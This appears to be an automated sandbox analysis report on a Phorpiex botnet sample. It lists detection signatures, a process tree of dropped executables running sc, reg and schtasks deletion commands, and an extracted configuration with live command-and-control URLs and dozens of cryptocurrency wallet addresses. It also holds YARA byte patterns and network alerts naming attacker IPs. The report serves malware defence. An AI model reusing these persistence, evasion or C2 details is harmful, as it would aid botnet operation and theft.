Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
a0RkmvhSaf.exe

Overview

General Information

Sample name:a0RkmvhSaf.exe
renamed because original name is a hash value
Original sample name:4c52cf849be8954638925c242e0cc976.exe
Analysis ID:1632967
MD5:4c52cf849be8954638925c242e0cc976
SHA1:949ba0061ea9dbe3b9059bb2a7b20caa74861280
SHA256:fa6fcf2e154c0b18b12ab86267ccd38d79cc9c27e7e261a7e9201a0a9dd9d0bb
Tags:exeuser-abuse_ch
Infos:

Detection

Phorpiex
Score:100
Range:0 - 100
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Antivirus detection for dropped file
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected Phorpiex
Allocates memory in foreign processes
Contains functionality to check if Internet connection is working
Contains functionality to detect sleep reduction / modifications
Creates a thread in another existing process (thread injection)
Drops executables to the windows directory (C:\Windows) and starts them
Found direct / indirect Syscall (likely to bypass EDR)
Found evasive API chain (may stop execution after checking mutex)
Hides that the sample has been downloaded from the Internet (zone.identifier)
Joe Sandbox ML detected suspicious sample
Uses cmd line tools excessively to alter registry or file data
Uses schtasks.exe or at.exe to add and modify task schedules
Writes to foreign memory regions
AV process strings found (often used to terminate AV products)
Abnormal high CPU Usage
Allocates memory with a write watch (potentially for evading sandboxes)
Connects to several IPs in different countries
Contains functionality for read data from the clipboard
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the clipboard data
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Detected TCP or UDP traffic on non-standard ports
Detected non-DNS traffic on DNS port
Detected potential crypto function
Downloads executable code via HTTP
Drops PE files
Drops PE files to the windows directory (C:\Windows)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found evaded block containing many API calls
Found evasive API chain (may stop execution after accessing registry keys)
Found large amount of non-executed APIs
IP address seen in connection with other malware
Installs a raw input device (often for capturing keystrokes)
Internet Provider seen in connection with other malware
May check if the current machine is a sandbox (GetTickCount - Sleep)
May sleep (evasive loops) to hinder dynamic analysis
One or more processes crash
PE file contains an invalid checksum
PE file does not import any functions
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Wow6432Node CurrentVersion Autorun Keys Modification
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses reg.exe to modify the Windows registry
Yara signature match

Classification

Process Tree

  • System is w10x64
  • a0RkmvhSaf.exe (PID: 8580 cmdline: "C:\Users\user\Desktop\a0RkmvhSaf.exe" MD5: 4C52CF849BE8954638925C242E0CC976)
    • 230053364.exe (PID: 8652 cmdline: C:\Users\user\AppData\Local\Temp\230053364.exe MD5: 87DCE6B601DA9E68982EF5BC7628468C)
      • sysludpvs.exe (PID: 8672 cmdline: C:\Windows\sysludpvs.exe MD5: 87DCE6B601DA9E68982EF5BC7628468C)
        • 152942395.exe (PID: 8952 cmdline: C:\Users\user\AppData\Local\Temp\152942395.exe MD5: C87843A4C7972D85F0D739E0E32F61AD)
          • 634722489.exe (PID: 9168 cmdline: C:\Users\user\AppData\Local\Temp\634722489.exe MD5: 64D97CEAC5D0FBB39F316EB8707C5AF4)
            • conhost.exe (PID: 9208 cmdline: "C:\Windows\System32\conhost.exe" "" MD5: 0D698AF330FD17BEE3BF90011D49251D)
              • WerFault.exe (PID: 6764 cmdline: C:\Windows\system32\WerFault.exe -u -p 9208 -s 944 MD5: FD27D9F6D02763BDE32511B5DF7FF7A0)
          • 2052810334.exe (PID: 6864 cmdline: C:\Users\user\AppData\Local\Temp\2052810334.exe MD5: B1C1D77E69753D822893438B35B2E7CC)
            • cmd.exe (PID: 6924 cmdline: "C:\Windows\System32\cmd.exe" /c sc delete "Windows Services" & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\Windows Services" /f MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
              • conhost.exe (PID: 6824 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
              • sc.exe (PID: 6708 cmdline: sc delete "Windows Services" MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
              • reg.exe (PID: 6916 cmdline: reg delete "HKLM\SYSTEM\CurrentControlSet\Services\Windows Services" /f MD5: 227F63E1D9008B36BDBCC4B397780BE4)
          • 417928448.exe (PID: 8500 cmdline: C:\Users\user\AppData\Local\Temp\417928448.exe MD5: 38C5CE383F70DC49175CC5843F017FF9)
            • cmd.exe (PID: 8424 cmdline: "C:\Windows\System32\cmd.exe" /c sc delete "WinSrvcsDrv" & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WinSrvcsDrv" /f MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
              • conhost.exe (PID: 8464 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
              • sc.exe (PID: 1828 cmdline: sc delete "WinSrvcsDrv" MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
              • reg.exe (PID: 8620 cmdline: reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WinSrvcsDrv" /f MD5: 227F63E1D9008B36BDBCC4B397780BE4)
          • 2047112978.exe (PID: 6084 cmdline: C:\Users\user\AppData\Local\Temp\2047112978.exe MD5: 9E1AAFB6D1C75D75F7E1A8E135F9C508)
            • cmd.exe (PID: 476 cmdline: "C:\Windows\System32\cmd.exe" /c sc delete "WinUpla" & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WinUpla" /f MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
              • conhost.exe (PID: 8628 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
              • sc.exe (PID: 1936 cmdline: sc delete "WinUpla" MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
              • reg.exe (PID: 8656 cmdline: reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WinUpla" /f MD5: 227F63E1D9008B36BDBCC4B397780BE4)
          • 399630275.exe (PID: 1364 cmdline: C:\Users\user\AppData\Local\Temp\399630275.exe MD5: 38C5CE383F70DC49175CC5843F017FF9)
            • cmd.exe (PID: 3816 cmdline: "C:\Windows\System32\cmd.exe" /c sc delete "WinSrvcsDrv" & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WinSrvcsDrv" /f MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
              • conhost.exe (PID: 1600 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
              • sc.exe (PID: 1312 cmdline: sc delete "WinSrvcsDrv" MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
              • reg.exe (PID: 1940 cmdline: reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WinSrvcsDrv" /f MD5: 227F63E1D9008B36BDBCC4B397780BE4)
          • 2028814805.exe (PID: 2332 cmdline: C:\Users\user\AppData\Local\Temp\2028814805.exe MD5: 11BFAECFB780B663434E2CCC81873C64)
            • cmd.exe (PID: 2340 cmdline: "C:\Windows\System32\cmd.exe" /c reg delete "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Windows Upgrade Service" /f MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
              • conhost.exe (PID: 2484 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
              • reg.exe (PID: 3324 cmdline: reg delete "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Windows Upgrade Service" /f MD5: 227F63E1D9008B36BDBCC4B397780BE4)
            • cmd.exe (PID: 3148 cmdline: "C:\Windows\System32\cmd.exe" /c schtasks /delete /f /tn "Windows Upgrade Service" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
              • conhost.exe (PID: 3348 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
              • schtasks.exe (PID: 3492 cmdline: schtasks /delete /f /tn "Windows Upgrade Service" MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • 393932919.exe (PID: 3564 cmdline: C:\Users\user\AppData\Local\Temp\393932919.exe MD5: 5E24B9457135B737012CDE5E30CF124B)
            • cmd.exe (PID: 2568 cmdline: "C:\Windows\System32\cmd.exe" /c sc delete "WinDrvUpd" & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WinDrvUpd" /f MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
              • conhost.exe (PID: 3868 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
              • sc.exe (PID: 4544 cmdline: sc delete "WinDrvUpd" MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
              • reg.exe (PID: 1468 cmdline: reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WinDrvUpd" /f MD5: 227F63E1D9008B36BDBCC4B397780BE4)
          • 1216017805.exe (PID: 4996 cmdline: C:\Users\user\AppData\Local\Temp\1216017805.exe MD5: 02320B5A9FFB3AA91FC2FE0F0906C575)
            • cmd.exe (PID: 5608 cmdline: "C:\Windows\System32\cmd.exe" /c reg delete "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Windows Upgrade Manager" /f MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
              • conhost.exe (PID: 2828 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
              • reg.exe (PID: 9020 cmdline: reg delete "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Windows Upgrade Manager" /f MD5: 227F63E1D9008B36BDBCC4B397780BE4)
            • cmd.exe (PID: 6288 cmdline: "C:\Windows\System32\cmd.exe" /c schtasks /delete /f /tn "Windows Upgrade Manager" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
              • conhost.exe (PID: 5444 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
              • schtasks.exe (PID: 6460 cmdline: schtasks /delete /f /tn "Windows Upgrade Manager" MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • 38822795.exe (PID: 6588 cmdline: C:\Users\user\AppData\Local\Temp\38822795.exe MD5: 9F3B28CD269F23EB326C849CB6D8ED3D)
            • cmd.exe (PID: 9188 cmdline: "C:\Windows\System32\cmd.exe" /c sc delete "WinUpdt" & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WinUpdt" /f MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
              • conhost.exe (PID: 9172 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
              • sc.exe (PID: 428 cmdline: sc delete "WinUpdt" MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
              • reg.exe (PID: 1400 cmdline: reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WinUpdt" /f MD5: 227F63E1D9008B36BDBCC4B397780BE4)
          • 396820397.exe (PID: 5380 cmdline: C:\Users\user\AppData\Local\Temp\396820397.exe MD5: 8F1F692C2E839E6F821E42057F8B1C01)
            • cmd.exe (PID: 8260 cmdline: "C:\Windows\System32\cmd.exe" /c sc delete "WinMngr" & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WinMngr" /f MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
              • conhost.exe (PID: 6140 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
              • sc.exe (PID: 3804 cmdline: sc delete "WinMngr" MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
              • reg.exe (PID: 6824 cmdline: reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WinMngr" /f MD5: 227F63E1D9008B36BDBCC4B397780BE4)
  • sysludpvs.exe (PID: 9076 cmdline: "C:\Windows\sysludpvs.exe" MD5: 87DCE6B601DA9E68982EF5BC7628468C)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
PhorpiexProofpoint describes Phorpiex/Trik as a SDBot fork (thus IRC-based) that has been used to distribute GandCrab, Pushdo, Pony, and coinminers. The name Trik is derived from PDB strings.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.phorpiex

Malware Configuration

Threatname: Phorpiex

{"C2 url": ["http://91.202.233.141/", "http://45.93.20.18/"], "Wallet": ["15TssKwtjMtwy4vDLcLsQUZUD2B9f7eDjw85sBNVC5LRPPnC", "1BzmrjmKPKSR2hH5BeJySfiVA676E8DYaK", "lskaj7asu8rwp4p9kpdqebnqh6kzyuefzqjszyd5w", "lava@100le8y8x7w4uls8dhkuvtzten5jyvxgfj0crhw", "ltc1qt0n3f0t7vz9k0mvcswk477shrxwjhf9sj5ykrp", "osmo125f3mw4xd9htpsq4zj5w5ezm5gags37y6pnhx3", "one1mnk7lk2506r0ewvr7zgwfuyt7ahvngwqedka3x", "3PMiLynrGVZ8oEqvoqC4hXD67B1WoALR4pc", "3ESHude8zUHksQg1h6hHmzY79BS36L91Yn", "EQxXrZv7VQpoAA15kJ1XJyXVxT3yQSoNyM", "EQBeqKxk-pwQ86KK0jwau5NKkjk9c-xtDR8kU5YP3OgROvlE", "Cz6xMbBst86mjM44qAaE5ahkD3F8JpLY7LFGHMiKYzwS6mn", "CSLKveRL2zqkbV2TqiFVuW6twtpqgFajoUZLAJQTTQk2", "DLUzwvyxN1RrwjByUPPzVMdfxNRPGVRMMA", "DsWwjQcpgo8AoFYvFnLrwFpcx8wgjSYLexe", "t1J6GCPCiHW1eRdjJgDDu6b1vSVmL5U7Twh", "terra1mw3dhwak2qe46drv4g7lvgwn79fzm8nr0htdq5", "thor1tdexg3v738xg9n289d6586frflkkcxxdgtauur", "tz1ZUNuZkWjdTt597axUcyZ5kFRtUZmUKuG2", "stars125f3mw4xd9htpsq4zj5w5ezm5gags37yxxh6mj", "stride125f3mw4xd9htpsq4zj5w5ezm5gags37y33qmy0", "sei125f3mw4xd9htpsq4zj5w5ezm5gags37ylk33kz", "sys1q0zg3clqajs04p2yhkgf96nf4hmup9mdr8l38u6", "bnb1msyt0djx4ecspfxg5en0ye465kg3kmv9utzml2", "bc1ppypcmu3684n648gyj62gjp2rw0xy7w3vwfamatlg29ajp4z52desafa0sr", "bc1qc9edl4hzl9jyt8twdad3zjeh2df2znq96tdezd", "btg1qwg85kf0r3885a82wtld053fy490lm2q2gemgpy", "GBQJMXYXPRIWFMXIFJR35ZB7LRKMB4PHCIUAUFR3TKUL6RDBZVLZEUJ3", "Gcrx8cK7ffKLaPJwiYHQrgi6pFTLbJsBPV", "B62qpDfv86fUZc4ntrYJL6eFJZajjNKRcBuW5iPbcLNkiPekLkV8NdA", "BKyTYg4eZC9NCzcL8M3hcUmDhCnBJrSScH", "ronin:a77fa3ea6e09a5f3fbfcb2a42fe21b5cf0ecdd1a", "bitcoincash:qph44jx8r9k5xeq5cuf958krv3ewrnp5vc6hhdjd3r", "cosmos125f3mw4xd9htpsq4zj5w5ezm5gags37yj6q8sr", "addr1qxlwyj95fk9exqf55tdknx49e5443nr925tajatrdqpp8djla7u9jhswc3dk39se79f9zhwwq2ca95er3mylm48wyalqr62dmg", "nano_3p8stz4wqicgda1g3ifd48girzd5u74is8sdqq99tkuuz1b96wjwbc7yrmnb"]}

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000008.00000002.1533636764.0000000000815000.00000004.00000020.00020000.00000000.sdmpWindows_Trojan_Donutloader_f40e3759unknownunknown
  • 0x39f6:$x64: 06 B8 03 40 00 80 C3 4C 8B 49 10 49
00000008.00000002.1533636764.0000000000815000.00000004.00000020.00020000.00000000.sdmpWindows_Trojan_Donutloader_5c38878dunknownunknown
  • 0x414d:$a: 24 48 03 C2 48 89 44 24 28 41 8A 00 84 C0 74 14 33 D2 FF C1
00000009.00000002.1614530538.00000218E1C80000.00000040.00000001.00020000.00000000.sdmpWindows_Trojan_Donutloader_f40e3759unknownunknown
  • 0x32a6:$x64: 06 B8 03 40 00 80 C3 4C 8B 49 10 49
00000009.00000002.1614530538.00000218E1C80000.00000040.00000001.00020000.00000000.sdmpWindows_Trojan_Donutloader_5c38878dunknownunknown
  • 0x39fd:$a: 24 48 03 C2 48 89 44 24 28 41 8A 00 84 C0 74 14 33 D2 FF C1
Process Memory Space: 230053364.exe PID: 8652JoeSecurity_Phorpiex_4Yara detected PhorpiexJoe Security
    Click to see the 2 entries

    Sigma Signatures

    System Summary

    barindex
    Sigma detected: Wow6432Node CurrentVersion Autorun Keys Modification
    Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: C:\Windows\sysludpvs.exe, EventID: 13, EventType: SetValue, Image: C:\Users\user\AppData\Local\Temp\230053364.exe, ProcessId: 8652, TargetObject: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\Windows Settings

    Suricata Signatures

    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
    2025-03-09T13:55:00.453495+010020224821A Network Trojan was detected192.168.2.54971591.202.233.14180TCP
    2025-03-09T13:55:05.878380+010020224821A Network Trojan was detected192.168.2.54971591.202.233.14180TCP
    2025-03-09T13:55:11.407235+010020224821A Network Trojan was detected192.168.2.54971591.202.233.14180TCP
    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
    2025-03-09T13:53:47.442508+010020219541A Network Trojan was detected91.202.233.14180192.168.2.549715TCP
    2025-03-09T13:55:05.651672+010020219541A Network Trojan was detected91.202.233.14180192.168.2.549715TCP
    2025-03-09T13:55:11.183356+010020219541A Network Trojan was detected91.202.233.14180192.168.2.549715TCP
    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
    2025-03-09T13:54:11.531492+010020185811A Network Trojan was detected192.168.2.54971591.202.233.14180TCP
    2025-03-09T13:54:17.250570+010020185811A Network Trojan was detected192.168.2.54971591.202.233.14180TCP
    2025-03-09T13:54:22.798147+010020185811A Network Trojan was detected192.168.2.54971591.202.233.14180TCP
    2025-03-09T13:54:28.093929+010020185811A Network Trojan was detected192.168.2.54971591.202.233.14180TCP
    2025-03-09T13:54:33.402546+010020185811A Network Trojan was detected192.168.2.54971591.202.233.14180TCP
    2025-03-09T13:54:38.687979+010020185811A Network Trojan was detected192.168.2.54971591.202.233.14180TCP
    2025-03-09T13:54:44.235197+010020185811A Network Trojan was detected192.168.2.54971591.202.233.14180TCP
    2025-03-09T13:54:49.628982+010020185811A Network Trojan was detected192.168.2.54971591.202.233.14180TCP
    2025-03-09T13:54:55.063271+010020185811A Network Trojan was detected192.168.2.54971591.202.233.14180TCP
    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
    2025-03-09T13:54:05.669674+010020440771A Network Trojan was detected192.168.2.56520392.244.232.10440500UDP
    2025-03-09T13:54:10.679974+010020440771A Network Trojan was detected192.168.2.56520337.150.149.4540500UDP
    2025-03-09T13:54:15.799890+010020440771A Network Trojan was detected192.168.2.5652035.76.154.7340500UDP
    2025-03-09T13:54:25.819396+010020440771A Network Trojan was detected192.168.2.5652035.233.112.11040500UDP
    2025-03-09T13:54:35.823349+010020440771A Network Trojan was detected192.168.2.56520337.151.27.19040500UDP
    2025-03-09T13:54:40.820928+010020440771A Network Trojan was detected192.168.2.56520379.164.150.2840500UDP
    2025-03-09T13:54:45.819654+010020440771A Network Trojan was detected192.168.2.565203213.206.60.17340500UDP
    2025-03-09T13:54:50.835431+010020440771A Network Trojan was detected192.168.2.565203213.206.62.25140500UDP
    2025-03-09T13:54:55.850747+010020440771A Network Trojan was detected192.168.2.565203151.233.107.5440500UDP
    2025-03-09T13:55:00.866581+010020440771A Network Trojan was detected192.168.2.56520393.188.86.25340500UDP
    2025-03-09T13:55:10.882436+010020440771A Network Trojan was detected192.168.2.565203113.86.140.22940500UDP
    2025-03-09T13:55:15.889415+010020440771A Network Trojan was detected192.168.2.565203178.88.234.20940500UDP
    2025-03-09T13:55:20.898234+010020440771A Network Trojan was detected192.168.2.565203146.70.53.16140500UDP
    2025-03-09T13:55:35.916043+010020440771A Network Trojan was detected192.168.2.565203147.30.105.21540500UDP
    2025-03-09T13:55:40.913812+010020440771A Network Trojan was detected192.168.2.56520390.156.165.9340500UDP
    2025-03-09T13:55:45.928871+010020440771A Network Trojan was detected192.168.2.5652032.181.203.19540500UDP
    2025-03-09T13:55:50.944333+010020440771A Network Trojan was detected192.168.2.565203216.107.138.16240500UDP
    2025-03-09T13:55:56.560493+010020440771A Network Trojan was detected192.168.2.56520395.56.224.16640500UDP
    2025-03-09T13:56:26.616255+010020440771A Network Trojan was detected192.168.2.56520395.142.87.20140500UDP
    2025-03-09T13:56:31.642799+010020440771A Network Trojan was detected192.168.2.565203178.253.102.21640500UDP
    2025-03-09T13:56:46.663102+010020440771A Network Trojan was detected192.168.2.56520395.58.24.17040500UDP
    2025-03-09T13:57:06.726544+010020440771A Network Trojan was detected192.168.2.56520389.35.132.11240500UDP
    2025-03-09T13:57:31.758230+010020440771A Network Trojan was detected192.168.2.5652032.180.93.4240500UDP
    2025-03-09T13:57:36.759089+010020440771A Network Trojan was detected192.168.2.56520378.39.225.18540500UDP
    2025-03-09T13:57:51.788766+010020440771A Network Trojan was detected192.168.2.56520393.180.124.340500UDP
    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
    2025-03-09T13:53:55.970019+010028032742Potentially Bad Traffic192.168.2.549709185.215.113.6680TCP
    2025-03-09T13:53:58.710704+010028032742Potentially Bad Traffic192.168.2.549709185.215.113.6680TCP
    2025-03-09T13:54:03.751692+010028032742Potentially Bad Traffic192.168.2.54971091.202.233.14180TCP
    2025-03-09T13:54:05.548445+010028032742Potentially Bad Traffic192.168.2.54971291.202.233.14180TCP
    2025-03-09T13:54:11.531492+010028032742Potentially Bad Traffic192.168.2.54971591.202.233.14180TCP
    2025-03-09T13:54:11.974570+010028032742Potentially Bad Traffic192.168.2.54971291.202.233.14180TCP
    2025-03-09T13:54:14.260907+010028032742Potentially Bad Traffic192.168.2.54971291.202.233.14180TCP
    2025-03-09T13:54:16.549798+010028032742Potentially Bad Traffic192.168.2.54971291.202.233.14180TCP
    2025-03-09T13:54:17.250570+010028032742Potentially Bad Traffic192.168.2.54971591.202.233.14180TCP
    2025-03-09T13:54:18.805223+010028032742Potentially Bad Traffic192.168.2.54971291.202.233.14180TCP
    2025-03-09T13:54:22.798147+010028032742Potentially Bad Traffic192.168.2.54971591.202.233.14180TCP
    2025-03-09T13:54:23.605572+010028032742Potentially Bad Traffic192.168.2.54958745.93.20.1880TCP
    2025-03-09T13:54:27.367765+010028032742Potentially Bad Traffic192.168.2.54958945.93.20.1880TCP
    2025-03-09T13:54:28.093929+010028032742Potentially Bad Traffic192.168.2.54971591.202.233.14180TCP
    2025-03-09T13:54:31.133646+010028032742Potentially Bad Traffic192.168.2.54959145.93.20.1880TCP
    2025-03-09T13:54:33.402546+010028032742Potentially Bad Traffic192.168.2.54971591.202.233.14180TCP
    2025-03-09T13:54:34.930434+010028032742Potentially Bad Traffic192.168.2.54959245.93.20.1880TCP
    2025-03-09T13:54:38.687979+010028032742Potentially Bad Traffic192.168.2.54971591.202.233.14180TCP
    2025-03-09T13:54:38.713259+010028032742Potentially Bad Traffic192.168.2.54959445.93.20.1880TCP
    2025-03-09T13:54:42.727357+010028032742Potentially Bad Traffic192.168.2.54959591.202.233.14180TCP
    2025-03-09T13:54:44.235197+010028032742Potentially Bad Traffic192.168.2.54971591.202.233.14180TCP
    2025-03-09T13:54:45.528581+010028032742Potentially Bad Traffic192.168.2.54959691.202.233.14180TCP
    2025-03-09T13:54:47.781200+010028032742Potentially Bad Traffic192.168.2.54959691.202.233.14180TCP
    2025-03-09T13:54:49.628982+010028032742Potentially Bad Traffic192.168.2.54971591.202.233.14180TCP
    2025-03-09T13:54:50.063393+010028032742Potentially Bad Traffic192.168.2.54959691.202.233.14180TCP
    2025-03-09T13:54:52.327644+010028032742Potentially Bad Traffic192.168.2.54959691.202.233.14180TCP
    2025-03-09T13:54:55.063271+010028032742Potentially Bad Traffic192.168.2.54971591.202.233.14180TCP
    2025-03-09T13:54:57.181848+010028032742Potentially Bad Traffic192.168.2.54959845.93.20.1880TCP
    2025-03-09T13:55:00.453495+010028032742Potentially Bad Traffic192.168.2.54971591.202.233.14180TCP
    2025-03-09T13:55:00.966612+010028032742Potentially Bad Traffic192.168.2.54960045.93.20.1880TCP
    2025-03-09T13:55:04.747416+010028032742Potentially Bad Traffic192.168.2.54960145.93.20.1880TCP
    2025-03-09T13:55:05.878380+010028032742Potentially Bad Traffic192.168.2.54971591.202.233.14180TCP
    2025-03-09T13:55:08.528664+010028032742Potentially Bad Traffic192.168.2.54960345.93.20.1880TCP
    2025-03-09T13:55:11.407235+010028032742Potentially Bad Traffic192.168.2.54971591.202.233.14180TCP
    2025-03-09T13:55:12.291313+010028032742Potentially Bad Traffic192.168.2.54960545.93.20.1880TCP
    2025-03-09T13:55:16.297318+010028032742Potentially Bad Traffic192.168.2.54960791.202.233.14180TCP
    2025-03-09T13:55:19.093052+010028032742Potentially Bad Traffic192.168.2.54960891.202.233.14180TCP
    2025-03-09T13:55:21.862183+010028032742Potentially Bad Traffic192.168.2.54961091.202.233.14180TCP
    2025-03-09T13:55:24.602892+010028032742Potentially Bad Traffic192.168.2.54961191.202.233.14180TCP
    2025-03-09T13:55:27.364644+010028032742Potentially Bad Traffic192.168.2.54961391.202.233.14180TCP
    2025-03-09T13:55:32.147306+010028032742Potentially Bad Traffic192.168.2.54961545.93.20.1880TCP
    2025-03-09T13:55:35.936299+010028032742Potentially Bad Traffic192.168.2.54961645.93.20.1880TCP
    2025-03-09T13:55:39.714414+010028032742Potentially Bad Traffic192.168.2.54961845.93.20.1880TCP
    2025-03-09T13:55:43.589369+010028032742Potentially Bad Traffic192.168.2.54962045.93.20.1880TCP
    2025-03-09T13:55:47.353905+010028032742Potentially Bad Traffic192.168.2.54962245.93.20.1880TCP
    2025-03-09T13:55:51.287294+010028032742Potentially Bad Traffic192.168.2.54962491.202.233.14180TCP
    2025-03-09T13:55:54.092835+010028032742Potentially Bad Traffic192.168.2.54962591.202.233.14180TCP
    2025-03-09T13:55:57.284640+010028032742Potentially Bad Traffic192.168.2.54962791.202.233.14180TCP
    2025-03-09T13:56:00.031906+010028032742Potentially Bad Traffic192.168.2.54962891.202.233.14180TCP
    2025-03-09T13:56:02.792944+010028032742Potentially Bad Traffic192.168.2.54963091.202.233.14180TCP
    2025-03-09T13:56:07.608857+010028032742Potentially Bad Traffic192.168.2.54963245.93.20.1880TCP
    2025-03-09T13:56:11.370667+010028032742Potentially Bad Traffic192.168.2.54963345.93.20.1880TCP
    2025-03-09T13:56:15.156822+010028032742Potentially Bad Traffic192.168.2.54963545.93.20.1880TCP
    2025-03-09T13:56:18.934891+010028032742Potentially Bad Traffic192.168.2.54963745.93.20.1880TCP
    2025-03-09T13:56:22.734701+010028032742Potentially Bad Traffic192.168.2.54963945.93.20.1880TCP
    2025-03-09T13:56:26.604411+010028032742Potentially Bad Traffic192.168.2.54964191.202.233.14180TCP
    2025-03-09T13:56:29.373772+010028032742Potentially Bad Traffic192.168.2.54964291.202.233.14180TCP
    2025-03-09T13:56:32.158811+010028032742Potentially Bad Traffic192.168.2.54964491.202.233.14180TCP
    2025-03-09T13:56:35.225653+010028032742Potentially Bad Traffic192.168.2.54964591.202.233.14180TCP
    2025-03-09T13:56:37.980446+010028032742Potentially Bad Traffic192.168.2.54964791.202.233.14180TCP
    2025-03-09T13:56:42.776940+010028032742Potentially Bad Traffic192.168.2.54964945.93.20.1880TCP
    2025-03-09T13:56:46.543602+010028032742Potentially Bad Traffic192.168.2.54965045.93.20.1880TCP
    2025-03-09T13:56:50.370269+010028032742Potentially Bad Traffic192.168.2.54965245.93.20.1880TCP
    2025-03-09T13:56:54.188891+010028032742Potentially Bad Traffic192.168.2.54965445.93.20.1880TCP
    2025-03-09T13:56:57.965212+010028032742Potentially Bad Traffic192.168.2.54965645.93.20.1880TCP
    2025-03-09T13:57:01.855945+010028032742Potentially Bad Traffic192.168.2.54965891.202.233.14180TCP
    2025-03-09T13:57:04.602502+010028032742Potentially Bad Traffic192.168.2.54965991.202.233.14180TCP
    2025-03-09T13:57:07.352960+010028032742Potentially Bad Traffic192.168.2.54966191.202.233.14180TCP
    2025-03-09T13:57:10.110738+010028032742Potentially Bad Traffic192.168.2.54966291.202.233.14180TCP
    2025-03-09T13:57:12.876902+010028032742Potentially Bad Traffic192.168.2.54967191.202.233.14180TCP
    2025-03-09T13:57:17.671813+010028032742Potentially Bad Traffic192.168.2.54967345.93.20.1880TCP
